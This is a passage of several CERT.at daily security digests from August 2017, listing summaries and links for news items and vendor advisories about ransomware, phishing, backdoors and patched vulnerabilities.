https://www.sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-…
∗∗∗ Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products ∗∗∗
---------------------------------------------
https://www.sec-consult.com/en/blog/advisories/multiple-critical-vulnerabil…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 18-08-2017 18:00 − Monday 21-08-2017 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Researchers Win $100,000 for New Spear-Phishing Detection Method ∗∗∗
---------------------------------------------
Facebook has awarded this year's Internet Defense Prize worth $100,000 to a team of researchers from the University of California, Berkeley, who came up with a new method of detecting spear-phishing attacks in closely monitored enterprise networks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/researchers-win-100-000-for-…
∗∗∗ How hackers target large cargo ships ∗∗∗
---------------------------------------------
With the help of malware, merchant ships can be paralysed and rendered unable to manoeuvre. Criminals could even cause two ships to collide.
---------------------------------------------
https://futurezone.at/digital-life/wie-hacker-grosse-frachtschiffe-ins-visi…
∗∗∗ Personal Security Guide – iOS/Android ∗∗∗
---------------------------------------------
We’ve covered a lot of personal security practices, but many people forget how important it is to secure mobile devices, which are riddled with personal information.
---------------------------------------------
https://blog.sucuri.net/2017/08/personal-security-guide-iosandroid.html
∗∗∗ Warning: Enigma Hacked; Over $470,000 in Ethereum Stolen So Far ∗∗∗
---------------------------------------------
More Ethereum Stolen! An unknown hacker has so far stolen more than $471,000 worth of Ethereum—one of the most popular and increasingly valuable cryptocurrencies—in yet another Ethereum hack that hit the popular cryptocurrency investment platform, Enigma.
---------------------------------------------
http://thehackernews.com/2017/08/enigma-cryptocurrency-hack.html
∗∗∗ DNSSEC Key Signing Key Rollover ∗∗∗
---------------------------------------------
On October 11, 2017, the Internet Corporation for Assigned Names and Numbers (ICANN) will be changing the Root Zone Key Signing Key (KSK) used in the domain name system (DNS) Security Extensions (DNSSEC) protocol. DNSSEC is a set of DNS protocol extensions used to digitally sign DNS information, which is an important part of preventing domain name hijacking. Updating the DNSSEC KSK is a crucial security step, similar to updating a PKI Root Certificate.
---------------------------------------------
https://www.us-cert.gov/ncas/current-activity/2017/08/21/DNSSEC-Key-Signing…
∗∗∗ Zero-day vulnerabilities in PDF Reader: Foxit will patch after all ∗∗∗
---------------------------------------------
Originally Foxit did not want to close the two vulnerabilities, which under certain circumstances allow attackers local code execution. In the meantime, however, the vendor has changed its mind.
---------------------------------------------
https://heise.de/-3807762
∗∗∗ SyncCrypt: new ransomware lurks in JPG files ∗∗∗
---------------------------------------------
To fool AV software, the SyncCrypt ransomware hides in image files. Once on the system, it is extracted and executed by a script. There are no free decryption tools so far.
---------------------------------------------
https://heise.de/-3808437
∗∗∗ Blowing the Whistle on Bad Attribution ∗∗∗
---------------------------------------------
The New York Times this week published a fascinating story about a young programmer in Ukraine who'd turned himself in to the local police. The Times says the man did so after one of his software tools was identified by the U.S. government as part of the arsenal used by Russian hackers suspected of hacking into the Democratic National Committee (DNC) last year. It's a good read, as long as you can ignore that the premise of the piece is completely wrong.
---------------------------------------------
https://krebsonsecurity.com/2017/08/blowing-the-whistle-on-bad-attribution/
∗∗∗ Hackers took over Playstation's Facebook and Twitter accounts ∗∗∗
---------------------------------------------
The hacker group OurMine posted various tweets and Facebook posts using the social media profiles
---------------------------------------------
http://derstandard.at/2000062906632
=====================
= Advisories =
=====================
∗∗∗ USN-3397-1: strongSwan vulnerability ∗∗∗
---------------------------------------------
A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 17.04, Ubuntu 16.04 LTS, Ubuntu 14.04 LTS. Summary: strongSwan could be made to crash or hang if it received specially crafted network traffic.
---------------------------------------------
http://www.ubuntu.com/usn/usn-3397-1/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in Oracle® Java™ Runtime Environment version 1.7 affect IBM Flex System Manager (FSM) Storage Manager Install Anywhere (SMIA) configuration tool ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=isg3T1025471
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect ASP.NET Core in IBM Bluemix ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22007209
∗∗∗ IBM Security Bulletin: No verification of user rights for certain applications on MaaS360 Windows installations (CVE-2017-1422) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006985
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in the IBM SDK, Java Technology Edition affects IBM Performance Management products ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22006808
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere DataPower XC10 Appliance ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22005299
∗∗∗ IBM Security Bulletin: Vulnerability CVE-2017-1000381 and CVE-2017-11499 in Node.js affects IBM i ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=nas8N1022230
∗∗∗ IBM Security Bulletin: January 2016 Java Platform Standard Edition Vulnerabilities in Multiple N Series Products ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1010526
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 17-08-2017 18:00 − Friday 18-08-2017 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Fraud: consumer advice centre warns of fake Youporn payment reminders ∗∗∗
---------------------------------------------
A spam campaign is currently sending alleged payment reminders for the use of Youporn in the name of a Munich law firm. The firm itself is warning about the forgeries.
---------------------------------------------
https://www.golem.de/news/betrug-verbraucherzentrale-warnt-vor-gefaelschten…
∗∗∗ OWASP 2017 Top 10 vs. 2013 Top 10 ∗∗∗
---------------------------------------------
After a long interval of four years, OWASP in April 2017 released a draft of its latest list of "Top 10 Web Application Security Vulnerabilities." The OWASP Top 10 has served as a benchmark for the world of application security for the last 14 years. It was designed to allow developers to identify and avoid [...]
---------------------------------------------
http://resources.infosecinstitute.com/owasp-2017-top-10-vs-2013-top-10/
∗∗∗ Hacker Publishes iOS Secure Enclave Firmware Decryption Key ∗∗∗
---------------------------------------------
A hacker identified only as xerub published the decryption key unlocking the iOS Secure Enclave Processor.
---------------------------------------------
http://threatpost.com/hacker-publishes-ios-secure-enclave-firmware-decrypti…
∗∗∗ Cisco closes a heap of security vulnerabilities ∗∗∗
---------------------------------------------
Cisco has closed 19 security vulnerabilities in a wide range of products with security updates. Three of the updates are rated high priority.
---------------------------------------------
https://heise.de/-3807549
∗∗∗ Fake A1 invoice installs malware ∗∗∗
---------------------------------------------
A fake A1 message asks recipients to visit a website and view their invoice there. Anyone who complies downloads the file „quittung.lnk“. This is not a cost statement but a shortcut to malware. For this reason you must not open the shortcut.
---------------------------------------------
https://www.watchlist-internet.at/gefaelschte-rechnungen/gefaelschte-a1-rec…
=====================
= Advisories =
=====================
∗∗∗ Philips DoseWise Portal Vulnerabilities ∗∗∗
---------------------------------------------
This medical device advisory contains mitigation details for hard-coded credentials and cleartext storage of sensitive information vulnerabilities in Philips’ DoseWise Portal web application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-17-229-01
∗∗∗ ZDI-17-693: Bitdefender Total Security bdfwfpf Kernel Driver Double Free Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Bitdefender Total Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-17-693/
∗∗∗ DFN-CERT-2017-1469: ClamAV: Several vulnerabilities allow, among other things, various denial-of-service attacks ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1469/
∗∗∗ DFN-CERT-2017-1476: Mozilla Thunderbird: Several vulnerabilities allow, among other things, the execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1476/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Monitoring ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22007056
∗∗∗ Splunk Input Validation Flaws in Web Interface Let Remote Users Conduct Cross-Site Scripting Attacks ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039198
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 16-08-2017 18:00 − Thursday 17-08-2017 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Banking Trojans Set Their Sights on Taxi and Ride-Hailing Apps ∗∗∗
---------------------------------------------
It was to be expected that Android banking trojan operators would eventually set their sights on ride-hailing applications, considering that these apps work with a user's financial data on a daily basis. [...]
---------------------------------------------
https://www.bleepingcomputer.com/news/security/banking-trojans-set-their-si…
∗∗∗ Ransomware: Locky returns once again ∗∗∗
---------------------------------------------
With Locky, a well-known ransomware returns after an absence of several months - with the file extensions Diablo6 and Lukitus. New versions keep appearing, presumably rented by criminals for extortion purposes.
---------------------------------------------
https://www.golem.de/news/ransomware-locky-kehrt-erneut-zurueck-1708-129539…
∗∗∗ NotPetya: Maersk expects losses of up to 300 million dollars ∗∗∗
---------------------------------------------
Container terminals stood still, ships could be neither unloaded nor loaded: for several weeks the trojan kept the Danish giant Maersk on edge. The shipping line Maersk Line and the port operator APM Terminals were hit hard.
---------------------------------------------
https://heise.de/-3804688
∗∗∗ Phone replacement parts can smuggle in malware ∗∗∗
---------------------------------------------
Attackers could use replacement parts to smuggle malware into smartphones unnoticed. So far there are no detection methods, let alone countermeasures, Israeli security researchers warn.
---------------------------------------------
https://heise.de/-3804758
∗∗∗ Security updates: attackers could slightly rebuild Drupal websites ∗∗∗
---------------------------------------------
Drupal users should promptly install the current versions. In these, the developers have closed several security vulnerabilities.
---------------------------------------------
https://heise.de/-3805042
∗∗∗ iMessage: new scam attempt making the rounds ∗∗∗
---------------------------------------------
Users are currently receiving messages with links that pressure them into entering personal data. They allegedly come from Apple.
---------------------------------------------
https://heise.de/-3804878
=====================
= Advisories =
=====================
∗∗∗ DSA-3944 mariadb-10.0 - security update ∗∗∗
---------------------------------------------
Several issues have been discovered in the MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB to the new upstream version 10.0.32. Please see the MariaDB 10.0 Release Notes for further details:
---------------------------------------------
https://www.debian.org/security/2017/dsa-3944
∗∗∗ Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-004 ∗∗∗
---------------------------------------------
Drupal 8.3.7 is a maintenance release which contains fixes for security vulnerabilities. Download Drupal 8.3.7. Updating your existing Drupal 8 sites is strongly recommended (see instructions for Drupal 8). This release fixes security issues only; there are no new features nor non-security-related bug fixes in this release. See the 8.3.7 release notes for details on important changes and known issues affecting this release.
---------------------------------------------
https://www.drupal.org/SA-CORE-2017-004
∗∗∗ Filr 3.2.1 Update ∗∗∗
---------------------------------------------
Abstract: This update provides a number of general bug fixes for Micro Focus Filr, Search and MySQL appliances including an updated Filr 3.2.1 Desktop client.
---------------------------------------------
https://download.novell.com/Download?buildid=zZ3A-xIEvO0~
∗∗∗ VU#793496: Open Shortest Path First (OSPF) protocol implementations may improperly determine LSA recency ∗∗∗
---------------------------------------------
http://www.kb.cert.org/vuls/id/793496
∗∗∗ Entity Reference - Moderately Critical - Access Bypass - DRUPAL-SA-CONTRIB-2017-067 ∗∗∗
---------------------------------------------
https://www.drupal.org/node/2902596
∗∗∗ Views refresh - Moderately Critical - Access Bypass - DRUPAL-SA-CONTRIB-2017-069 ∗∗∗
---------------------------------------------
https://www.drupal.org/node/2902606
∗∗∗ Views - Moderately Critical - Access Bypass - DRUPAL-SA-CONTRIB-2017-068 ∗∗∗
---------------------------------------------
https://www.drupal.org/node/2902604
∗∗∗ Cisco Application Policy Infrastructure Controller SSH Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco TelePresence Video Communication Server Denial of Service Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Ultra Services Platform Deployment Configuration Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Ultra Services Framework AutoVNF Configuration Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Unified Communications Manager Horizontal Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco StarOS for ASR 5000 Series Routers Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco StarOS for ASR 5000 Series Routers FTP Configuration File Modification Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco StarOS for ASR 5000 Series Routers Command-Line Interface Security Bypass Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Elastic Services Controller Sensitive Log Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Elastic Services Controller Configuration Parameters Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Elastic Services Controller Cross-Site Scripting Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Elastic Services Controller Configuration Files Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Virtual Network Function Element Manager Arbitrary Command Execution Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Security Appliances SNMP Polling Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco RV340, RV345, and RV345P Dual WAN Gigabit VPN Routers Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Policy Suite Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Prime Infrastructure HTML Injection Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco AnyConnect WebLaunch Cross-Site Scripting Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Application Policy Infrastructure Controller Custom Binary Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ IBM Security Bulletin: Security Vulnerabilities in Apache FOP and Apache Batik affect IBM WebSphere Portal (CVE-2017-5661, CVE-2017-5662) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22006871
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 14-08-2017 18:00 − Wednesday 16-08-2017 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Millions of RDP Endpoints Exposed Online and Ready for Bad Things ∗∗∗
---------------------------------------------
An Internet-wide scan carried out by security researchers from Rapid7 has discovered over 11 million devices with 3389/TCP ports left open online, of which over 4.1 million are specifically speaking the RDP protocol. [...]
---------------------------------------------
https://www.bleepingcomputer.com/news/security/millions-of-rdp-endpoints-ex…
∗∗∗ Pulse Wave - New DDoS Assault Pattern Discovered ∗∗∗
---------------------------------------------
A new method of carrying out DDoS attacks named Pulse Wave is causing problems to certain DDoS mitigation solutions, allowing attackers to down servers previously thought to be secured. [...]
---------------------------------------------
https://www.bleepingcomputer.com/news/security/pulse-wave-new-ddos-assault-…
∗∗∗ Attackers Backdoor Another Software Update Mechanism ∗∗∗
---------------------------------------------
Researchers at Kaspersky Lab said today that the update mechanism for Korean server management software provider NetSarang was compromised and serving a backdoor called ShadowPad.
---------------------------------------------
http://threatpost.com/attackers-backdoor-another-software-update-mechanism/…
∗∗∗ Analysis of a Paypal phishing kit, (Wed, Aug 16th) ∗∗∗
---------------------------------------------
There are plenty of phishing kits in the wild that try to lure victims to provide their credentials. Services like Paypal are nice targets and we can find new fake pages almost daily. Sometimes, the web server isn't properly configured and the source code is publicly available. A few days ago, I was lucky to find a ZIP archive containing a very nice phishing kit targeting Paypal. I took some time to have a look at it.
---------------------------------------------
https://isc.sans.edu/diary/rss/22726
∗∗∗ Security Afterworks Special – GDPR (DSGVO) – Short talks and discussion ∗∗∗
---------------------------------------------
October 03, 2017 - 4:30 pm - 6:00 pm SBA Research Favoritenstraße 16 1040 Wien
---------------------------------------------
https://www.sba-research.org/events/security-afterworks-dsgvo/
∗∗∗ Decoding Complex Malware – Step-by-Step ∗∗∗
---------------------------------------------
When cleaning websites, one of the most complicated parts of our job is ensuring we find all backdoors. Most of the time, attackers inject code into different locations to increase the chances of reinfecting the site and maintaining access for as long as possible. Our research finds that in 67% of the websites we clean, there is at least one backdoor variant.
---------------------------------------------
https://blog.sucuri.net/2017/08/malware-decoding-step-step-guide.html
∗∗∗ The Crisis of Connected Cars: When Vulnerabilities Affect the CAN Standard ∗∗∗
---------------------------------------------
In many instances, researchers and engineers have found ways to hack into modern, internet-capable cars, as has been documented and reported several times. One famous example is the Chrysler Jeep hack that researchers Charlie Miller and Chris Valasek discovered. This hack and those that have come before it have mostly been reliant on specific vulnerabilities in specific makes and/or brands of cars. And once reported, these vulnerabilities were quickly resolved. But what should the security [...]
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/SJgibQgcZtQ/
∗∗∗ ShadowPad: Espionage backdoor uncovered in admin tools for Unix and Linux servers ∗∗∗
---------------------------------------------
A sophisticated backdoor was delivered by attackers via a correctly signed update to the network admin tools of the Korean company NetSarang. It took more than two weeks before the espionage trojan was detected in the network of a banking institution.
---------------------------------------------
https://heise.de/-3803225
∗∗∗ EV ransomware is targeting WordPress sites ∗∗∗
---------------------------------------------
WordPress security outfit Wordfence has flagged several attempts by attackers to upload ransomware that provides them with the ability to encrypt a WordPress website’s files. They dubbed the malware "EV ransomware", due to the .ev extension that is added to the encrypted files.
---------------------------------------------
https://www.helpnetsecurity.com/2017/08/16/wordpress-ransomware/
=====================
= Advisories =
=====================
∗∗∗ BMC Medical and 3B Medical Luna CPAP Machine ∗∗∗
---------------------------------------------
This medical device advisory contains mitigation details for an improper input validation vulnerability in BMC Medical’s and 3B Medical’s Luna continuous positive airway pressure therapy machine.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-17-227-01
∗∗∗ Identity Reporting 5.5.1 ∗∗∗
---------------------------------------------
Abstract: This service pack provides enhancements and software fixes for Identity Reporting. For more information about these updates, see the service pack details.
---------------------------------------------
https://download.novell.com/Download?buildid=iGYyq6xwjhE~
∗∗∗ Citrix XenServer Multiple Security Updates ∗∗∗
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer that may allow a malicious administrator of a guest VM to compromise the host.
---------------------------------------------
https://support.citrix.com/article/CTX225941
∗∗∗ DFN-CERT-2017-1441: Xen: Multiple vulnerabilities allow, among other things, privilege escalation ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1441/
∗∗∗ DFN-CERT-2017-1442: Red Hat JBoss Data Virtualization: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1442/
∗∗∗ Security Advisory - Out-of-Bounds Memory Access Vulnerability in the Boot Loaders of Huawei Mobile Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-…
∗∗∗ Security Advisory - Two Vulnerabilities in Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170807-…
∗∗∗ Security Advisory - Arbitrary Memory Write Vulnerability in Some Huawei Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-…
∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Huawei Honor 5S Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-…
∗∗∗ Security Advisory - Integer Overflow Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-…
∗∗∗ Security Advisory - Lack of Signature Verification Vulnerability in Some Huawei APP ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM® SDK for Node.js™ in IBM Bluemix ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22006722
∗∗∗ IBM Security Bulletin: Vulnerability in Rational DOORS Next Generation with potential for Cross-Site Scripting (CVE-2017-1338) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22004138
∗∗∗ IBM Security Bulletin: Security Vulnerability in IBM Java SDK for Quarterly CPU – April 2017 affects IBM Rational Software Architect and Rational Software Architect for WebSphere Software (CVE-2017-3511) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007149
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect Watson Explorer (CVE-2016-8688, CVE-2016-8689, CVE-2017-5601, CVE-2016-10209, CVE-2016-10350, CVE-2016-10349) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006995
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM® SDK Java™ Technology Edition Version 6, 7, 8 and IBM® Runtime Environment Java™ Version 6, 7, 8 in IBM FileNet Content Manager, and IBM Content Foundation ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21998551
∗∗∗ IBM Security Bulletin: Potential security vulnerability in the WebSphere Application Server Admin Console (CVE-2017-1501) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22006810
∗∗∗ IBM Security Bulletin: IBM Security Access Manager is affected by an OpenSSL vulnerability (CVE-2016-8610) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22007023
∗∗∗ IBM Security Bulletin: IBM Security Access Manager appliances are affected by multiple Network Time Protocol (NTP) vulnerabilities ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22007067
∗∗∗ SSA-275839 (Last Update 2017-08-16): Denial-of-Service Vulnerability in Industrial Products ∗∗∗
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-275839…
∗∗∗ SSA-293562 (Last Update 2017-08-16): Vulnerabilities in Industrial Products ∗∗∗
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-293562…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 11-08-2017 18:00 − Monday 14-08-2017 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Researchers hack a computer with manipulated DNA ∗∗∗
---------------------------------------------
Even DNA is not safe from malware: researchers at the University of Washington were able to take over a computer with the help of manipulated DNA.
---------------------------------------------
https://futurezone.at/digital-life/forscher-hacken-computer-mit-manipuliert…
∗∗∗ Remotelock LS-6i: Firmware update permanently destroys smart door locks ∗∗∗
---------------------------------------------
A manufacturer of smart door locks has permanently destroyed at least 500 customer devices through a faulty firmware update. Many Airbnb hosts in particular are affected; a replacement programme has been started.
---------------------------------------------
https://www.golem.de/news/remotelock-ls-6i-firmware-update-zerstoert-smarte…
∗∗∗ Sonic Spy: Researchers find over 4,000 spying Android apps ∗∗∗
---------------------------------------------
A single provider is said to have put around 4,000 apps with malicious content into circulation since the beginning of the year, some of them via Google Play. The apps can activate the microphone and record phone calls.
---------------------------------------------
https://www.golem.de/news/sonic-spy-forscher-finden-ueber-4000-spionierende…
∗∗∗ Many Factors Conspire in ICS/SCADA Attacks ∗∗∗
---------------------------------------------
A report on the state of SCADA and ICS security points out that critical infrastructure operators are caught between hackers and a lack of vendor and executive support.
---------------------------------------------
http://threatpost.com/many-factors-conspire-in-icsscada-attacks/127407/
∗∗∗ Outlook Web Access based attacks, (Sat, Aug 12th) ∗∗∗
---------------------------------------------
Recently we've started seeing some attacks that utilise OWA. A person in the victim organisation sends an email to one or more of their customers informing them of a change in account details. The attacker provides instructions to customers on paying their account utilising the new account details. The email is cc'ed to other internal staff, adding a level of legitimacy (also compromised accounts).
---------------------------------------------
https://isc.sans.edu/diary/rss/22710
∗∗∗ A new issue of our SWITCH Security Report is available! ∗∗∗
---------------------------------------------
Dear Reader! A new issue of our bi-monthly SWITCH Security Report is available! The topics covered in this report are: Family business: Petya and its derivatives sweep over half the world as a new wave of ransomware Pay a ransom [...]
---------------------------------------------
https://securityblog.switch.ch/2017/08/14/a-new-issue-of-our-switch-securit…
∗∗∗ Security update: Symantec's Messaging Gateway is susceptible to malicious code ∗∗∗
---------------------------------------------
With the current version, the developers have closed two security holes in the protection solution.
---------------------------------------------
https://heise.de/-3799171
∗∗∗ Database server PostgreSQL: Flaw allows login without a password ∗∗∗
---------------------------------------------
Administrators running PostgreSQL databases should update their software. Under certain circumstances attackers can log in to the servers without entering a password, the developers warn.
---------------------------------------------
https://heise.de/-3799721
=====================
= Advisories =
=====================
∗∗∗ DSA-3937 zabbix - security update ∗∗∗
---------------------------------------------
Lilith Wyatt discovered two vulnerabilities in the Zabbix network monitoring system which may result in execution of arbitrary code or database writes by malicious proxies.
---------------------------------------------
https://www.debian.org/security/2017/dsa-3937
∗∗∗ HPESBHF03768 rev.1 - HPE Intelligent Management Center (iMC) PLAT, Remote Code Execution ∗∗∗
---------------------------------------------
Potential security vulnerabilities have been identified in HPE Intelligent Management Center (iMC) Plat. These vulnerabilities could be exploited remotely to allow remote code execution.
---------------------------------------------
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf037…
∗∗∗ VMSA-2017-0014 ∗∗∗
---------------------------------------------
VMware NSX-V Edge updates address OSPF Protocol LSA DoS
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2017-0014.html
∗∗∗ DSA-3936 postgresql-9.6 - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2017/dsa-3936
∗∗∗ DSA-3935 postgresql-9.4 - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2017/dsa-3935
∗∗∗ IBM Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM SONAS ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=ssg1S1010501
∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in the IBM SDK Java Technology Edition affect IBM Domino ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22005160
∗∗∗ IBM Security Bulletin: A vulnerability in Samba affects IBM Spectrum Scale SMB protocol access method (CVE-2017-9461) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1010376
∗∗∗ IBM Security Bulletin: IBM Security Access Manager Appliance is affected by a Network Security Services (NSS) vulnerability (CVE-2017-5461) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006960
Next End-of-Day Report: 2017-08-16
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 10-08-2017 18:00 − Friday 11-08-2017 18:00
Handler: Alexander Riepl
Co-Handler:
=====================
= News =
=====================
∗∗∗ Git and co.: Malicious code repositories can attack the client ∗∗∗
---------------------------------------------
Using specially crafted SSH URLs, an attacker can execute code in the client tools of source code management systems. The flaw affects practically all widespread source code management systems such as Git, Subversion, Mercurial and CVS.
---------------------------------------------
https://www.golem.de/news/git-und-co-boesartige-code-repositories-koennen-client-angreifen-1708-129441.html
∗∗∗ Ukrainian Video-Blogger Arrested For Spreading Petya (NotPetya) Ransomware ∗∗∗
---------------------------------------------
Ukrainian authorities have arrested a 51-year-old man accused of distributing the infamous Petya ransomware (Petya.A, also known as NotPetya) — the same computer virus that massively hit numerous businesses, organisations and banks in Ukraine ..
---------------------------------------------
https://thehackernews.com/2017/08/ukraine-petya-ransomware-hacker.html
∗∗∗ Russia's Fancy Bear Hackers Used Leaked NSA Tool "Eternal Blue" to Target Hotel Guests ∗∗∗
---------------------------------------------
The same hackers who hit the DNC and the Clinton campaign are now apparently spying on high-value travelers via Wi-Fi
---------------------------------------------
https://www.wired.com/story/fancy-bear-hotel-hack
∗∗∗ Secure passwords: Many of the conventional security rules are useless ∗∗∗
---------------------------------------------
Passwords need special characters, upper- and lower-case letters and digits, and must be changed often – many of these rules do not increase security but often achieve the opposite. The originator of these rules now regrets them.
---------------------------------------------
https://heise.de/-3797935
∗∗∗ "Game of Thrones": HBO wollte Hackern 250.000 Dollar Lösegeld
zahlen ∗∗∗
---------------------------------------------
